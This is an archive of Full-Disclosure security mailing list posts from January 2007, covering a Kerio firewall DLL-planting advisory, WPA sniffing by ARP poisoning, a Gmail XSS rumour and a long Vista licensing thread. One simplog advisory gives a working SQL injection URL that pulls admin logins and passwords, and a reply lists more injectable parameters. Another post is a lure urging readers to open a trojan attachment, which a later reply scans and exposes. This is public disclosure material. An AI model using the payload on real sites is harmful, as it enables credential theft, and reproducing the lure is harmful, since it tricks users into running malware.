From andurmatrix at gmail.com Mon Jan 1 08:47:22 2007 From: andurmatrix at gmail.com (andur matrix) Date: Mon, 1 Jan 2007 00:47:22 -0800 Subject: [Full-disclosure] [OOT] Thesis for master degree In-Reply-To: <200612181553.kBIFr3hZ031168@turing-police.cc.vt.edu> References: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com> <002e01c7213b$6cdabc90$0200a8c0@AMD2500> <200612181553.kBIFr3hZ031168@turing-police.cc.vt.edu> Message-ID: Hi, First make sure which topic you are interested: attacking or defending. They are of quite different philosophy. If you are into attacking in nature, you can not do very well in defending. You will find it boring. andur. On 12/18/06, Valdis.Kletnieks at vt.edu wrote: > > On Sat, 16 Dec 2006 17:55:50 GMT, Aaron Gray said: > > > > >- Disassembling Vista Security > > > > This is illegal. So not a very good idea for the thesis. > > This of course is *very* dependent on what country you are in. > > In the US, the most important law involved would probably be the DMCA, > which *does* have an exception for reverse engineering for compatibility > research (17 USC 1201(f)), encryption research (17 USC 1201(g)), and > security testing (17 USC 1201(j)). > > > http://www.law.cornell.edu/uscode/html/uscode17/usc_sec_17_00001201----000-.html > > Note that 17 USC 1201(j)(2) *specifically* hints that you *really* want > an in-writing "Get Out Of Jail Free" card for 18 USC 1030 and related. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070101/99414043/attachment.html From denzity at gmail.com Mon Jan 1 11:26:15 2007 From: denzity at gmail.com (Denzity) Date: Mon, 1 Jan 2007 11:26:15 +0000 Subject: [Full-disclosure] Gmail XSS? Message-ID: <2a6cc4320701010326i3897aa18nac9a6255c27d4095@mail.gmail.com> There's reports of a gmail xss in the wild that will steal someone's contact list and email if they website is visited while being logged in to gmail. http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/ I can't find this on Bugtraq or any release. Anyone have any more info or a PoC? Thanks, Denzity. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070101/6de0f9bd/attachment.html From research at matousec.com Mon Jan 1 13:05:49 2007 From: research at matousec.com (Matousec - Transparent security Research) Date: Mon, 01 Jan 2007 14:05:49 +0100 Subject: [Full-disclosure] Kerio Fake 'iphlpapi' DLL injection Vulnerability Message-ID: <4599072D.1020209@matousec.com> Hello, We would like to inform you about a vulnerability Sunbelt Kerio Personal Firewall: Description: When Sunbelt Kerio Personal Firewall (SKPF) loads dependant modules, it relies on the operating system. System library iphlpapi.dll is located in the system directory but the main SKPF service, which requires and loads this DLL, is located in the installation directory of SKPF. This is why it tries to find iphlpapi.dll in its installation directory at first and then, if it is not found in this directory, it tries to find it in the system directory. Moreover, it is possible to create new files in the installation directory of SKPF. A malicious application can create a fake iphlpapi.dll in the installation directory of SKPF, which will be loaded by the operating system into the SKPF service during its initialization. This is how the malicious application is able to execute an arbitrary code inside SKPF service and bypass any of its security mechanisms. Vulnerable software: * Sunbelt Kerio Personal Firewall 4.3.268 * Sunbelt Kerio Personal Firewall 4.3.246 * probably all versions of Sunbelt Kerio Personal Firewall 4 * possibly older versions of Sunbelt Kerio Personal Firewall More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From geoincidents at nls.net Mon Jan 1 19:26:52 2007 From: geoincidents at nls.net (Geo.) Date: Mon, 1 Jan 2007 14:26:52 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered Message-ID: <0EF6A58451764E158D6B1B54A834423D@control3> The other day I used my router to limit my Vista laptop from talking to anything but one subnet on the internet. 3 days later suddenly some things would not work. Solitaire failed to start, click on it and you get the magic donut showing it's starting up then nothing. Right click on network and pick properties you get the magic donut showing it's starting up then nothing. So I removed the routes so Vista could once again phone home and within a minute or two both solitaire and network properties worked just fine. Now this Vista system is less than 30 days old and has already been activated. So the claims that Reduced Function mode only kicks in if you don't activate within 30 days is bunk if this is Reduced Function mode. So I decided to trigger RF mode on purpose to see how it responds. I stopped the Software License service which claims that doing so will trigger RF mode. 24 hours later solitaire, network properties, and control panel all show the same behavior, the magic donut showing they are starting up then nothing. No events in event log, nothing. I then started the Software License service and presto like magic these functions work again. So I'm convinced that the machine being routed so it can't talk to MS triggered RF mode within a few days. Now to me this seems pretty clear even though it wasn't a real scientific method of testing. And further, this looks to me like an accident waiting to happen. I mean imagine if MS fell off the planet we would have a pretty major problem as the bulk of the worlds computers started shutting down, talk about a security issue? So anyone here with a bit more technical expertise want to pick up this ball and run with it? Geo. From coderman at gmail.com Mon Jan 1 22:29:38 2007 From: coderman at gmail.com (coderman) Date: Mon, 1 Jan 2007 14:29:38 -0800 Subject: [Full-disclosure] Authenticated users can sniff WPA traffic? In-Reply-To: <20061231234244.063F58B87F@www1.email.si> References: <20061231234244.063F58B87F@www1.email.si> Message-ID: <4ef5fec60701011429w29671209vd9bbc3b8b57dfa5a@mail.gmail.com> On 12/31/06, /dev/null wrote: > ... > recently I came across this link: > http://seclists.org/pen-test/2005/Nov/0073.html > > Basicaly, it states that authenticated users, in combination with ARP > poisoning, can sniff WPA traffic. Can anybody confirm this is possible? If > that's true, is there any way to prevent this? of course it's true. don't let ARP poisoning occur on your network. most good wifi security tools / systems will check for this among the other usual masquerading (rogue AP's, injection with invalid timestamps, etc). note that a mandatory part of this attack is having auth credentials for WPA-PSK or WPA-Enterprise (EAP/TLS,etc) so you can talk on the network to mount this ARP poisoning attack. > I would really appreciate any info/link/paper regarding topic. any good IP routing text would be useful, particularly the interplay between ethernet (and other L2 protocols) and IP via ARP/RARP. as one last side note, if you've got the WPA-PSK secret via dictionary attack you can combine this with disassociate injection to force all clients to re-authenticate while you are listening so you can recover the client keys (TKIP or CCMP) used for communication and get better results since you no longer need the ARP hack which will be slower and more brittle (you must remain in the loop) comparatively. From drfrancky at securax.org Mon Jan 1 22:31:49 2007 From: drfrancky at securax.org (Javor Ninov) Date: Tue, 02 Jan 2007 00:31:49 +0200 Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection Message-ID: <45998BD5.2040303@securax.org> Afected Software: simplog up to 0.9.3.2 (latest version - 12/05/2006 ) Site: http://www.simplog.org Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple Vulnerability: SQL Injection in archive.php other files probably also affected Example: http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 Vendor status: NOT NOTIFIED Javor Ninov aka DrFrancky drfrancky shift+2 securax.org http://securitydot.net/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/088297a6/attachment.bin From php0t at zorro.hu Mon Jan 1 22:29:10 2007 From: php0t at zorro.hu (php0t) Date: Mon, 1 Jan 2007 23:29:10 +0100 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <0EF6A58451764E158D6B1B54A834423D@control3> Message-ID: <001401c72df4$4225c470$650ba8c0@DORKA> Didn't have the chance / interest to meet Vista myself as of yet, but if what you wrote isn't user error or something specific and limited to only a few computers then excuse me a moment while i lmao. BTW, is there anything in vista's agreement in legalish that could be translated into 'you agree that you feed your software internet' ? Maybe micro$ says that this is needed to verify that you're running a legal OS every now and then, so $uck it ? :-) Sorry for not having ideas just raising more questions, hope somebody replies in a few pointing out the obvious. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo. Sent: Monday, January 01, 2007 8:27 PM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Vista Reduced Function mode triggered The other day I used my router to limit my Vista laptop from talking to anything but one subnet on the internet. 3 days later suddenly some things would not work. Solitaire failed to start, click on it and you get the magic donut showing it's starting up then nothing. Right click on network and pick properties you get the magic donut showing it's starting up then nothing. So I removed the routes so Vista could once again phone home and within a minute or two both solitaire and network properties worked just fine. Now this Vista system is less than 30 days old and has already been activated. So the claims that Reduced Function mode only kicks in if you don't activate within 30 days is bunk if this is Reduced Function mode. So I decided to trigger RF mode on purpose to see how it responds. I stopped the Software License service which claims that doing so will trigger RF mode. 24 hours later solitaire, network properties, and control panel all show the same behavior, the magic donut showing they are starting up then nothing. No events in event log, nothing. I then started the Software License service and presto like magic these functions work again. So I'm convinced that the machine being routed so it can't talk to MS triggered RF mode within a few days. Now to me this seems pretty clear even though it wasn't a real scientific method of testing. And further, this looks to me like an accident waiting to happen. I mean imagine if MS fell off the planet we would have a pretty major problem as the bulk of the worlds computers started shutting down, talk about a security issue? So anyone here with a bit more technical expertise want to pick up this ball and run with it? Geo. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From simon at snosoft.com Mon Jan 1 23:16:59 2007 From: simon at snosoft.com (Simon Smith) Date: Mon, 01 Jan 2007 18:16:59 -0500 Subject: [Full-disclosure] Jeff Bernstein In-Reply-To: <4591AC90.3020201@digitalmunition.com> Message-ID: It has come to my attention that Jeff Bernstein has been falsely using the names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been falsely associating himself with the SNOsoft/HP/DMCA vulnerability research and development ordeal that happened earlier in 2001. Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor will he ever be. Jeff Bernstein does not work with nor has he ever directly worked with any of the SNOsoft Team Members. If anyone has talked with, or speaks with Jeff Bernstein in the future and if Mr. Bernstein mentions SNOsoft, please contact me immediately at simon at snosoft.com. Thank you. Regards, Simon Smith SNOsoft Research Team http://www.snosoft.com From juha-matti.laurio at netti.fi Mon Jan 1 23:20:19 2007 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Tue, 2 Jan 2007 01:20:19 +0200 (EET) Subject: [Full-disclosure] Gmail XSS? Message-ID: <24544829.1096251167693620156.JavaMail.juha-matti.laurio@netti.fi> According to this news it was fixed already: http://blogs.zdnet.com/Google/?p=434 See a quote of Google Security Team - Juha-Matti Denzity wrote: > > There's reports of a gmail xss in the wild that will steal someone's contact > list and email if they website is visited while being logged in to gmail. > > http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/ > > I can't find this on Bugtraq or any release. Anyone have any more info or > a PoC? > > Thanks, Denzity. From geoincidents at nls.net Mon Jan 1 23:35:25 2007 From: geoincidents at nls.net (Geo.) Date: Mon, 1 Jan 2007 18:35:25 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <001401c72df4$4225c470$650ba8c0@DORKA> References: <001401c72df4$4225c470$650ba8c0@DORKA> Message-ID: <8A738FD57A404DE9941CD67CE94C4067@control3> > anything in vista's agreement in legalish that could be translated into > 'you agree that you feed your software internet' ? http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx Yep, specifies "internet" under requirements. Should specify unrestricted internet access if you ask me. Geo. From poof at fansubber.com Tue Jan 2 00:02:41 2007 From: poof at fansubber.com (Poof) Date: Mon, 1 Jan 2007 16:02:41 -0800 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <8A738FD57A404DE9941CD67CE94C4067@control3> Message-ID: The issues that the original poster is having don't sound anything like normal behavior. One of the scenarios expected in Vista would be a Laptop that's been activated being used in a restricted internet work zone. And if that laptop has been activated normally (The 1-time activation as provided with the Windows install.) it shouldn't go to reduced mode. Further, it'll give a 30 day warning prior to going to reduced mode if it's suddenly deactivated asking for it to be reactivated. (Say a hardware change/etc.) In the short, I am unable to repro this. I'm currently running Vista on two systems; the other system is in a sandbox. (However, was "open" during the activation process.) Erm, from what I can see from the requirements, Internet is not required as it's in the same format as Audio. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo. Sent: Monday, January 01, 2007 3:35 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered > anything in vista's agreement in legalish that could be translated into > 'you agree that you feed your software internet' ? http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx Yep, specifies "internet" under requirements. Should specify unrestricted internet access if you ask me. Geo. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From sebastian.wolfgarten at gmx.net Tue Jan 2 00:56:50 2007 From: sebastian.wolfgarten at gmx.net (Sebastian Wolfgarten) Date: Tue, 2 Jan 2007 01:56:50 +0100 Subject: [Full-disclosure] Security contact at TrendMicro Message-ID: <200701020156.50130.sebastian.wolfgarten@gmx.net> Hi, does anyknow know a security contact at TrendMicro? I was unable to find one on their website and tried both security at trendmicro.com as well as info at trendmicro.com but they bounced back. Anyone? Thanks. Ah yeah, Happy New Year everyone! Best regards, Sebastian Wolfgarten From dfklsddshd at nerdshack.com Tue Jan 2 00:52:47 2007 From: dfklsddshd at nerdshack.com (dfklsddshd) Date: Mon, 01 Jan 2007 19:52:47 -0500 Subject: [Full-disclosure] Simcard 0day. Message-ID: <4599ACDF.6060709@nerdshack.com> Simcard 0day. Works with all cellphones. 1. Open attachment. 2. Type cellphone number. 3. Wait. Needs net connection. -------------- next part -------------- A non-text attachment was scrubbed... Name: Simcard.com Type: application/octet-stream Size: 73216 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070101/ea26d883/attachment.obj From kf_lists at digitalmunition.com Tue Jan 2 01:42:06 2007 From: kf_lists at digitalmunition.com (K F (lists)) Date: Mon, 01 Jan 2007 20:42:06 -0500 Subject: [Full-disclosure] Welcome to Pwndertino... Message-ID: <4599B86E.7010209@digitalmunition.com> Just in case you are drunk / hungover / out of town or whatever... this is a friendly reminder that MOAB has begun. http://projects.info-pull.com/moab/index.html -KF From BlueBoar at thievco.com Tue Jan 2 01:43:05 2007 From: BlueBoar at thievco.com (Blue Boar) Date: Mon, 01 Jan 2007 17:43:05 -0800 Subject: [Full-disclosure] Simcard 0day. In-Reply-To: <4599ACDF.6060709@nerdshack.com> References: <4599ACDF.6060709@nerdshack.com> Message-ID: <4599B8A9.3090600@thievco.com> dfklsddshd wrote: > 1. Open attachment. Does this actually work on people on a security mailing list? BB Complete scanning result of "Simcard.com", received in VirusTotal at 01.02.2007, 02:38:58 (CET). Antivirus Version Update Result AntiVir 7.3.0.21 01.01.2007 TR/Spy.Banker.73216 Authentium 4.93.8 12.30.2006 no virus found Avast 4.7.892.0 12.30.2006 no virus found AVG 386 01.01.2007 no virus found BitDefender 7.2 01.01.2007 GenPack:Generic.Banker.OT.924A93D1 CAT-QuickHeal 8.00 01.01.2007 (Suspicious) - DNAScan ClamAV devel-20060426 01.01.2007 no virus found DrWeb 4.33 12.31.2006 WIN.MAIL.WORM.Virus eSafe 7.0.14.0 01.01.2007 Suspicious Trojan/Worm eTrust-InoculateIT 23.73.102 12.30.2006 no virus found eTrust-Vet 30.3.3289 12.29.2006 no virus found Ewido 4.0 01.01.2007 no virus found Fortinet 2.82.0.0 01.01.2007 suspicious F-Prot 3.16f 12.30.2006 no virus found F-Prot4 4.2.1.29 12.30.2006 no virus found Ikarus T3.1.0.27 01.01.2007 Trojan-Spy.Win32.Banker.axc Kaspersky 4.0.2.24 01.02.2007 no virus found McAfee 4929 12.29.2006 no virus found Microsoft 1.1904 12.31.2006 no virus found NOD32v2 1951 01.01.2007 probably unknown NewHeur_PE virus Norman 5.80.02 12.31.2007 no virus found Panda 9.0.0.4 01.01.2007 Suspicious file Prevx1 V2 01.02.2007 no virus found Sophos 4.13.0 01.01.2007 no virus found Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious TheHacker 6.0.3.141 01.01.2007 no virus found VBA32 3.11.1 01.01.2007 no virus found VirusBuster 4.3.19:9 01.01.2007 no virus found Aditional Information File size: 73216 bytes MD5: 5f22c38e77383a68f865a2c8d9c84f0c SHA1: c1a76dc5fa43d102b447057ce16ad44e8dcf456f packers: YODA packers: YodaProt Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics. VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware. From jays at panix.com Tue Jan 2 03:11:02 2007 From: jays at panix.com (Jay Sulzberger) Date: Mon, 1 Jan 2007 22:11:02 -0500 (EST) Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: References: Message-ID: On Mon, 1 Jan 2007, Poof wrote: > The issues that the original poster is having don't sound anything like > normal behavior. One of the scenarios expected in Vista would be a Laptop > that's been activated being used in a restricted internet work zone. And if > that laptop has been activated normally (The 1-time activation as provided > with the Windows install.) it shouldn't go to reduced mode. Further, it'll > give a 30 day warning prior to going to reduced mode if it's suddenly > deactivated asking for it to be reactivated. (Say a hardware change/etc.) > > In the short, I am unable to repro this. I'm currently running Vista on two > systems; the other system is in a sandbox. (However, was "open" during the > activation process.) > > Erm, from what I can see from the requirements, Internet is not required as > it's in the same format as Audio. The issue is not: How Microsoft treats those whose boxes Microsoft has Tojaned. The issue is: Microsoft should not be root on my computer. And no EULA can take away root from me and grant root to Microsoft on any computer I own. oo--JS. > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo. > Sent: Monday, January 01, 2007 3:35 PM > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered > > >> anything in vista's agreement in legalish that could be translated into >> 'you agree that you feed your software internet' ? > > http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx > > Yep, specifies "internet" under requirements. Should specify unrestricted > internet access if you ask me. > > Geo. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From Robert_Moore at brown.edu Tue Jan 2 03:07:16 2007 From: Robert_Moore at brown.edu (Moore, Robert) Date: Mon, 1 Jan 2007 22:07:16 -0500 Subject: [Full-disclosure] (no subject) Message-ID: <08429EB7F8E69841B295084BA07401A9B6D1C9@MAIL3.AD.Brown.Edu> Simon Smith of the SNOsoft Research Team provides the url > but when you go there, you get: The SNOsoft Research Team has been acquired by Netragard, L.L.C. http://www.netragard.com um, did someone forget to tell Mr. Smith ?? ;-) bob moore ----------------------------------------------------------------------------------------------------------- Date: Mon, 01 Jan 2007 18:16:59 -0500 From: Simon Smith Subject: [Full-disclosure] Jeff Bernstein It has come to my attention that Jeff Bernstein has been falsely using the names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been falsely associating himself with the SNOsoft/HP/DMCA vulnerability research and development ordeal that happened earlier in 2001. Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor will he ever be. Jeff Bernstein does not work with nor has he ever directly worked with any of the SNOsoft Team Members. If anyone has talked with, or speaks with Jeff Bernstein in the future and if Mr. Bernstein mentions SNOsoft, please contact me immediately at simon at snosoft.com. Thank you. Regards, Simon Smith SNOsoft Research Team http://www.snosoft.com From str0ke at milw0rm.com Tue Jan 2 03:06:05 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 1 Jan 2007 21:06:05 -0600 Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection In-Reply-To: <45998BD5.2040303@securax.org> References: <45998BD5.2040303@securax.org> Message-ID: <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com> Javor, It seems rgod found this vulnerability back in April of 2006. http://www.milw0rm.com/exploits/1663 <> ii) http://[target]/[path]/index.php?blogid=[sql] http://[target]/[path]/archive.php?blogid=[sql] http://[target]/[path]/archive.php?m=[sql] http://[target]/[path]/archive.php?y=[sql] /str0ke On 1/1/07, Javor Ninov wrote: > Afected Software: > simplog up to 0.9.3.2 (latest version - 12/05/2006 ) > > Site: > http://www.simplog.org > Simplog provides an easy way for users to add blogging capabilities to > their existing websites. Simplog is written in PHP and compatible with > multiple databases. Simplog also features an RSS/Atom aggregator/reader. > Powerful, yet simple > > Vulnerability: > SQL Injection in archive.php > other files probably also affected > > Example: > http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 > > Vendor status: > NOT NOTIFIED > > > Javor Ninov aka DrFrancky > drfrancky shift+2 securax.org > http://securitydot.net/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > From simon at snosoft.com Tue Jan 2 04:08:39 2007 From: simon at snosoft.com (Simon Smith) Date: Mon, 01 Jan 2007 23:08:39 -0500 Subject: [Full-disclosure] (no subject) In-Reply-To: <08429EB7F8E69841B295084BA07401A9B6D1C9@MAIL3.AD.Brown.Edu> Message-ID: Very observant of you Bob, the SNOsoft site is not active right now. We hope to reactivate it later on in 2007. Any more questions? :] On 1/1/07 10:07 PM, "Moore, Robert" wrote: > Simon Smith of the SNOsoft Research Team provides the url > > > but when you go there, you get: > > The SNOsoft Research Team has been acquired by Netragard, L.L.C. > > http://www.netragard.com > > um, did someone forget to tell Mr. Smith ?? > > ;-) > > bob moore > ------------------------------------------------------------------------------ > ----------------------------- > Date: Mon, 01 Jan 2007 18:16:59 -0500 > From: Simon Smith > Subject: [Full-disclosure] Jeff Bernstein > > It has come to my attention that Jeff Bernstein has been falsely using the > names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been > falsely associating himself with the SNOsoft/HP/DMCA vulnerability research > and development ordeal that happened earlier in 2001. > > Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor > will he ever be. Jeff Bernstein does not work with nor has he ever directly > worked with any of the SNOsoft Team Members. > > If anyone has talked with, or speaks with Jeff Bernstein in the future and > if Mr. Bernstein mentions SNOsoft, please contact me immediately at > simon at snosoft.com. > > Thank you. > > Regards, > Simon Smith > SNOsoft Research Team > http://www.snosoft.com > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From geoincidents at nls.net Tue Jan 2 04:12:05 2007 From: geoincidents at nls.net (Geo.) Date: Mon, 1 Jan 2007 23:12:05 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: References: Message-ID: <124D5077DBBE441C9C559CFBC6544999@control3> > In the short, I am unable to repro this. I'm currently running Vista on > two > systems; the other system is in a sandbox. (However, was "open" during the > activation process.) One thing you might try is instead of cutting it off entirely from the internet, use an external device to limit what internet addresses it can talk to so that it has a valid and working gateway but it can't phone home. Also, it didn't happen immediately, I implemented the routing and then it was 3 days before I noticed things weren't working (may have been less but I just didn't notice till then), tried rebooting to cure the problems, poked around at other things, nothing helped. Then upon removing the routing and letting it talk to the whole net it was only minutes before everything was working again. Geo. From php0t at zorro.hu Tue Jan 2 04:37:23 2007 From: php0t at zorro.hu (php0t) Date: Tue, 2 Jan 2007 05:37:23 +0100 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <124D5077DBBE441C9C559CFBC6544999@control3> Message-ID: <002401c72e27$b2a860d0$650ba8c0@DORKA> > One thing you might try is instead of cutting it off entirely from the internet, use an external device to limit what internet > addresses it can talk to so that it has a valid and working gateway but it can't phone home. I doubt Vista wants to google for porn instead of phoning home. After reading the other posts, I think the question is still there, if you cut a vista's internet access after it's been activated, does it go to reduced mode because of not being able to phone home? Anybody with certain results on this? From Larry at larryseltzer.com Tue Jan 2 04:40:48 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 1 Jan 2007 23:40:48 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <002401c72e27$b2a860d0$650ba8c0@DORKA> Message-ID: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local> >>if you cut a vista's internet access after it's been activated, does it go to reduced mode because of not being able to phone home? It just can't be that simple. There has to be more to what happened to the guy. Lots of computers are offline for several days at a time, it's inconceivable that they didn't test that. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From php0t at zorro.hu Tue Jan 2 05:03:52 2007 From: php0t at zorro.hu (php0t) Date: Tue, 2 Jan 2007 06:03:52 +0100 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local> Message-ID: <002501c72e2b$65cdb540$650ba8c0@DORKA> > It just can't be that simple. There has to be more to what happened to the guy. Lots of computers are offline for several > days at a time, it's inconceivable that they didn't test that. Yeah, probably - but just for the fun of it I'm curious what happened (unless it's some dumb user error). From geoincidents at nls.net Tue Jan 2 05:09:49 2007 From: geoincidents at nls.net (Geo.) Date: Tue, 2 Jan 2007 00:09:49 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local> Message-ID: > It just can't be that simple. There has to be more to what happened to > the guy. Lots of computers are offline for several days at a time, it's > inconceivable that they didn't test that. Ok, as complete as I can be in the few minutes I have to post this. During those three days I did a lot of poking around, stopping and starting services, switching from wired to wireless and back, trying to view high def video (which I still am not able to do in any video player except WMP for some reason) installing codecs and software, running into the event ID 4226 tcp security connect limit, etc. However I never got any notification of deactivation or any problem of that sort. Then on the third day suddenly solitaire would not start up and I couldn't get into network properties. I did a bunch of rebooting and trouble shooting trying to figure that out but got nowhere. So I went back to trying to get high def video to work in Media player classic and figured perhaps it was trying to download a codec so I removed the routes. It didn't help the video but I quickly found network properties started working. So then I tried solitaire and it worked. This was all directly after removing the routes, there wasn't but a few minutes between letting it talk to the net and these apps starting to work again. I decided this was probably reduced functionality in action but since I had never seen it before I needed some way to trigger it so I could compare since it would take 3 days to reproduce with route blocking. I disabled the software licensing service since it claims disabling that service will kick off reduced functionality mode. Nothing happened immediately but 24 hours later solitaire and network properties (and now control panel) would not start up. It was exactly the same apps and behavior. I enabled and started the software licensing service and in seconds things returned to fully functional just like removing the routes did. So it's possible the routes didn't trigger it, but removing them sure cured it quickly so that is my guess at this point. Further testing is needed. I won't be testing it for a couple days as I need the laptop connected to other networks to try some other software I need to test. (that tcp limit may prove a problem for network monitoring) Geo. From randy at procyonlabs.com Tue Jan 2 06:12:05 2007 From: randy at procyonlabs.com (Randal T. Rioux) Date: Tue, 02 Jan 2007 01:12:05 -0500 Subject: [Full-disclosure] Simcard 0day. In-Reply-To: <4599B8A9.3090600@thievco.com> References: <4599ACDF.6060709@nerdshack.com> <4599B8A9.3090600@thievco.com> Message-ID: <4599F7B5.4000202@procyonlabs.com> Blue Boar wrote: > dfklsddshd wrote: >> 1. Open attachment. > > Does this actually work on people on a security mailing list? > > BB > > Complete scanning result of "Simcard.com", received in VirusTotal at > 01.02.2007, 02:38:58 (CET). > you would be quite surprised, i'm sure. randy From jammer128 at gmail.com Tue Jan 2 07:44:42 2007 From: jammer128 at gmail.com (Jason Miller) Date: Tue, 2 Jan 2007 01:44:42 -0600 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: References: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local> Message-ID: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com> lol i want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function, think it would give humourous results. unless it 'phones home' by visiting a page and printing said info, which in that case it would probably be simple enough to modify the server it goes to and make it think its going to microsoft, in that event you could easily get cd keys if thats how it verifies its a real vista copy. On 1/1/07, Geo. wrote: > > > > It just can't be that simple. There has to be more to what happened to > > the guy. Lots of computers are offline for several days at a time, it's > > inconceivable that they didn't test that. > > Ok, as complete as I can be in the few minutes I have to post this. > > During those three days I did a lot of poking around, stopping and > starting > services, switching from wired to wireless and back, trying to view high > def > video (which I still am not able to do in any video player except WMP for > some reason) installing codecs and software, running into the event ID > 4226 > tcp security connect limit, etc. > > However I never got any notification of deactivation or any problem of > that > sort. Then on the third day suddenly solitaire would not start up and I > couldn't get into network properties. I did a bunch of rebooting and > trouble > shooting trying to figure that out but got nowhere. > > So I went back to trying to get high def video to work in Media player > classic and figured perhaps it was trying to download a codec so I removed > the routes. It didn't help the video but I quickly found network > properties > started working. So then I tried solitaire and it worked. This was all > directly after removing the routes, there wasn't but a few minutes between > letting it talk to the net and these apps starting to work again. > > I decided this was probably reduced functionality in action but since I > had > never seen it before I needed some way to trigger it so I could compare > since it would take 3 days to reproduce with route blocking. I disabled > the > software licensing service since it claims disabling that service will > kick > off reduced functionality mode. Nothing happened immediately but 24 hours > later solitaire and network properties (and now control panel) would not > start up. It was exactly the same apps and behavior. I enabled and started > the software licensing service and in seconds things returned to fully > functional just like removing the routes did. > > So it's possible the routes didn't trigger it, but removing them sure > cured > it quickly so that is my guess at this point. Further testing is needed. I > won't be testing it for a couple days as 